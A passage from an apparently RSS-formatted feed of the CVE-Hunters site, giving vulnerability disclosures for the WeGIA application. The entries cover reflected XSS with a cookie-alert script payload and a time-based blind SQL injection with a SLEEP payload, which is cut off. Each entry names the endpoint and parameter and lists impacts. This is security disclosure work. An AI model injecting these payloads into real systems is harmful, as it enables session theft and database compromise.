&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;document&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;cookie&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22600/401178088-6c97c557-c4d2-4c61-b595-7c5d03b44340.png&amp;#34;
	width=&amp;#34;1967&amp;#34;
	height=&amp;#34;819&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22600/401178088-6c97c557-c4d2-4c61-b595-7c5d03b44340_hu_d260d4985fde988d.png 480w, /p/cve-2025-22600/401178088-6c97c557-c4d2-4c61-b595-7c5d03b44340_hu_9722b25eb2a6c525.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;240&amp;#34;
		data-flex-basis=&amp;#34;576px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22600/401178160-2961a9d0-6ded-45f7-8a75-14cac8744e55.png&amp;#34;
	width=&amp;#34;1398&amp;#34;
	height=&amp;#34;389&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22600/401178160-2961a9d0-6ded-45f7-8a75-14cac8744e55_hu_360336d16c266165.png 480w, /p/cve-2025-22600/401178160-2961a9d0-6ded-45f7-8a75-14cac8744e55_hu_a35260cfc16364ff.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;359&amp;#34;
		data-flex-basis=&amp;#34;862px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; Reflected cross-site scripting (XSS) attacks can have serious consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data theft: Attackers can exfiltrate data or install malware on the user&amp;#39;s machine.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malicious code: Attackers can execute malicious code on the user&amp;#39;s system.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Business reputation damage: Attackers can deface a corporate website or spread misinformation.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v856-wjh3-4rhg&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v856-wjh3-4rhgcode&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 10 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-22139</title>
        <link>https://www.cvehunters.com/p/cve-2025-22139/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-22139/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-22139-cross-site-scripting-xss-reflected-endpoint-configuracao_geralphp-parameter-msg&amp;#34;&amp;gt;CVE-2025-22139: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;configuracao_geral.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;msg&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22139&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22139&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;configuracao_geral.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;html/configuracao/configuracao_geral.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;msg&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-22139-cross-site-scripting-xss-reflected-endpoint-configuracao_geralphp-parameter-msg&amp;#34;&amp;gt;CVE-2025-22139: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;configuracao_geral.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;msg&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22139&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22139&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;configuracao_geral.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;html/configuracao/configuracao_geral.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;msg&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;document&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;cookie&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22139/401185701-f6cfca17-0f5b-4a97-94c6-a3186b4a4017.png&amp;#34;
	width=&amp;#34;1361&amp;#34;
	height=&amp;#34;326&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22139/401185701-f6cfca17-0f5b-4a97-94c6-a3186b4a4017_hu_823f98a492b13599.png 480w, /p/cve-2025-22139/401185701-f6cfca17-0f5b-4a97-94c6-a3186b4a4017_hu_e891ddf1c91c722c.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;417&amp;#34;
		data-flex-basis=&amp;#34;1001px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; This vulnerability allows an attacker to:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data theft: Attackers can exfiltrate data or install malware on the user&amp;#39;s machine.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malicious code: Attackers can execute malicious code on the user&amp;#39;s system.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Business reputation damage: Attackers can deface a corporate website or spread misinformation.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xrjq-57mq-4hf8&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xrjq-57mq-4hf8&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/angelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Angelo Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 08 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-22140</title>
        <link>https://www.cvehunters.com/p/cve-2025-22140/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-22140/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-22140-sql-injection-blind-time-based-endpoint-dependente_listar_umphp-parameter-id_dependente&amp;#34;&amp;gt;CVE-2025-22140: SQL Injection (Blind Time-Based) endpoint &amp;lt;code&amp;gt;dependente_listar_um.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22140&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22140&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the &amp;lt;code&amp;gt;/html/funcionario/dependente_listar_um.php&amp;lt;/code&amp;gt; endpoint, specifically in the &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;  parameter. This vulnerability allows attackers to execute arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/funcionario/dependente_listar_um.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt; parameter. This allows attackers to inject malicious SQL payloads that are executed directly by the database. This could result in unauthorized access to sensitive information, data manipulation, and operational disruptions.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-22140-sql-injection-blind-time-based-endpoint-dependente_listar_umphp-parameter-id_dependente&amp;#34;&amp;gt;CVE-2025-22140: SQL Injection (Blind Time-Based) endpoint &amp;lt;code&amp;gt;dependente_listar_um.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22140&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22140&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the &amp;lt;code&amp;gt;/html/funcionario/dependente_listar_um.php&amp;lt;/code&amp;gt; endpoint, specifically in the &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;  parameter. This vulnerability allows attackers to execute arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/funcionario/dependente_listar_um.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt; parameter. This allows attackers to inject malicious SQL payloads that are executed directly by the database. This could result in unauthorized access to sensitive information, data manipulation, and operational disruptions.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-sql&amp;#34; data-lang=&amp;#34;sql&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt;  &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;AND&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;SELECT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;7525&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;FROM&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;SELECT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;SLEEP&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span 